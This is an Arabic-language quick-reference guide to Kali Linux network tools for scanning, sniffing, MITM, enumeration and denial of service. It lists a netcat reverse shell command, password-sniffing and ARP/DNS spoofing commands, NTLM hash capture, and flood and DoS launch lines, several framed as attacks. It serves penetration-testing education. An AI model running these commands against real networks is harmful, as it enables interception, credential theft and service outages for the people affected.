أدوات الشبكات
دليل متكامل لأدوات اختبار وتحليل أمان الشبكات في Kali Linux
ماسحات الشبكة
أدوات اكتشاف الأجهزة والخدمات في الشبكةNmap
الأداة الذهبيةأشهر ماسح شبكات في العالم - يستخدم لاكتشاف الأجهزة والمنافذ والخدمات
nmap -sS 192.168.1.1
SYN Scan سريع
nmap -A -T4 target.com
فحص متقدم
nmap -p 1-65535 -sV 10.0.0.1
فحص جميع المنافذ
الاستخدامات:
- اكتشاف الأجهزة في الشبكة
- فحص الثغرات الأمنية
- تدقيق جدران الحماية
Zenmap
الواجهة الرسوميةالواجهة الرسومية الرسمية لـ Nmap - تسهل استخدام الأداة للمبتدئين
zenmap
تشغيل الواجهة
Masscan
الأسرعأسرع ماسح شبكات في العالم - يمكنه فحص الإنترنت بالكامل في دقائق
masscan 192.168.1.0/24 -p80
فحص المنفذ 80
masscan 0.0.0.0/0 -p443 --rate=10000
فحص HTTPS عالمي
Netdiscover
الشبكات المحليةأداة اكتشاف الأجهزة في الشبكات المحلية - تعمل بـ ARP
netdiscover -r 192.168.1.0/24
فحص النطاق
netdiscover -p
وضع المراقبة
Unicornscan
المتقدمماسح شبكات متقدم - يجمع بين الفحص وجمع المعلومات
unicornscan 192.168.1.1
فحص أساسي
unicornscan -Iv 10.0.0.1:1-1000
فحص متقدم
Angry IP Scanner
خفيف وسريعأداة فحص IP بسيطة وسريعة - تدعم Ping والمنافذ
ipscan
تشغيل الأداة
متشممون الشبكة
أدوات التقاط وتحليل حزم الشبكةWireshark
ملك المتشممينأشهر وأقوى محلل حزم شبكات في العالم - واجهة رسومية متطورة
wireshark
تشغيل الواجهة
tshark -i eth0
سطر أوامر
Tcpdump
أداة سطر الأوامرأداة التقاط الحزم في سطر الأوامر - خفيفة وسريعة
tcpdump -i eth0
التقاط مباشر
tcpdump -r capture.pcap
قراءة ملف
tcpdump port 80
فلتر HTTP
Dsniff
سرقة البياناتمجموعة أدوات لاعتراض وتحليل حركة الشبكة وكلمات المرور
dsniff -i eth0
سرقة كلمات المرور
urlsnarf -i eth0
اعتراض URLs
Ngrep
بحث في الحزمأداة grep للحزم - تبحث عن أنماط محددة في حركة الشبكة
ngrep -i "password" port 80
بحث عن كلمة مرور
ngrep -d eth0
مراقبة واجهة
تحليل البروتوكولات
أدوات تحليل واختبار بروتوكولات الشبكةEttercap
هجمات MITMأداة شاملة لهجمات الرجل في الوسط - تحليل وتسمم البروتوكولات
ettercap -G
واجهة رسومية
ettercap -T -M arp /192.168.1.1/ /192.168.1.2/
ARP poisoning
Bettercap
الجيل الجديدإطار عمل متطور لهجمات الشبكات - بديل Ettercap الحديث
bettercap
واجهة تفاعلية
net.probe on
استكشاف الشبكة
arp.spoof on
تسمم ARP
Netcat
سكين الجيش السويسريأداة متعددة الاستخدامات لقراءة وكتابة البيانات عبر الشبكة
nc -lvp 4444
خادم استماع
nc 192.168.1.1 80
اتصال بـ HTTP
nc -e /bin/sh 10.0.0.1 4444
شل عكسي
Socat
Netcat on steroidsنسخة متقدمة من Netcat مع دعم بروتوكولات أكثر
socat TCP-LISTEN:80 TCP4:192.168.1.1:80
إعادة توجيه
socat - OPENSSL:example.com:443
اتصال SSL
Hping3
حزم مخصصةأداة لإنشاء وإرسال حزم TCP/IP مخصصة - تحليل واختبار
hping3 -S -p 80 192.168.1.1
SYN scan
hping3 -1 10.0.0.1
ICMP ping
hping3 --flood -a TARGET
اختبار تحمل
هجمات التزوير والاعتراض
أدوات هجمات MITM والتزويرArpspoof
تزوير ARPأداة لتزوير جدول ARP - اعتراض حركة المرور بين جهازين
arpspoof -i eth0 -t 192.168.1.1 192.168.1.2
تزوير ARP
echo 1 > /proc/sys/net/ipv4/ip_forward
تفعيل التوجيه
Dnsspoof
تزوير DNSتزوير استجابات DNS - توجيه الضحايا لمواقع مزيفة
dnsspoof -i eth0 -f hosts.txt
تزوير DNS
echo "192.168.1.100 google.com" > hosts.txt
إعداد التزوير
Macchanger
تغيير MACتغيير عنوان MAC لبطاقة الشبكة - إخفاء الهوية وتجاوز الفلاتر
macchanger -r wlan0
عشوائي
macchanger -m 00:11:22:33:44:55 wlan0
تغيير يدوي
Responder
LLMNR/NBT-NSأداة لاعتراض مصادقات LLMNR و NBT-NS - سرقة تجزئات NTLM
responder -I eth0
تشغيل الأداة
responder -I eth0 -w
مع WPAD
Mitmproxy
اعتراض HTTP/HTTPSوكيل اعتراض متقدم لـ HTTP/HTTPS - تحليل وتعديل الطلبات
mitmproxy
واجهة تفاعلية
mitmdump
سطر أوامر
تعداد وتجميع المعلومات
أدوات جمع المعلومات وتعداد الشبكةNbtscan
NetBIOSمسح أسماء NetBIOS - جمع معلومات عن أجهزة Windows
nbtscan 192.168.1.0/24
مسح الشبكة
nbtscan -v 10.0.0.1
مفصل
Smbclient
SMB/CIFSعميل SMB لاستعراض ومشاركة الملفات مع أنظمة Windows
smbclient -L 192.168.1.1
قائمة المشاركات
smbclient //192.168.1.1/share
الاتصال
Enum4linux
Windows enumerationتعداد شامل لأجهزة Windows - مستخدمين، مشاركات، سياسات
enum4linux 192.168.1.1
تعداد كامل
enum4linux -U 10.0.0.1
قائمة المستخدمين
هجمات الحرمان من الخدمة
أدوات اختبار تحمل الأنظمةSlowloris
هجوم بطيءهجوم DoS يعتمد على إبقاء اتصالات HTTP مفتوحة لأطول وقت
slowloris target.com
بدء الهجوم
THC-SSL-DoS
هجوم SSLهجوم DoS على خوادم SSL - استهلاك موارد إعادة التفاوض
thc-ssl-dos target.com 443
بدء الهجوم
مرجع سريع لأوامر الشبكات
فحص الشبكة
nmap -sn 192.168.1.0/24
اكتشاف الأجهزة
فحص المنافذ
nmap -p 1-1000 -sV 10.0.0.1
المنافذ المفتوحة
التقاط الحزم
tcpdump -i eth0 -w capture.pcap
حفظ الحركة
تزوير ARP
arpspoof -i eth0 -t 192.168.1.1 192.168.1.2
اعتراض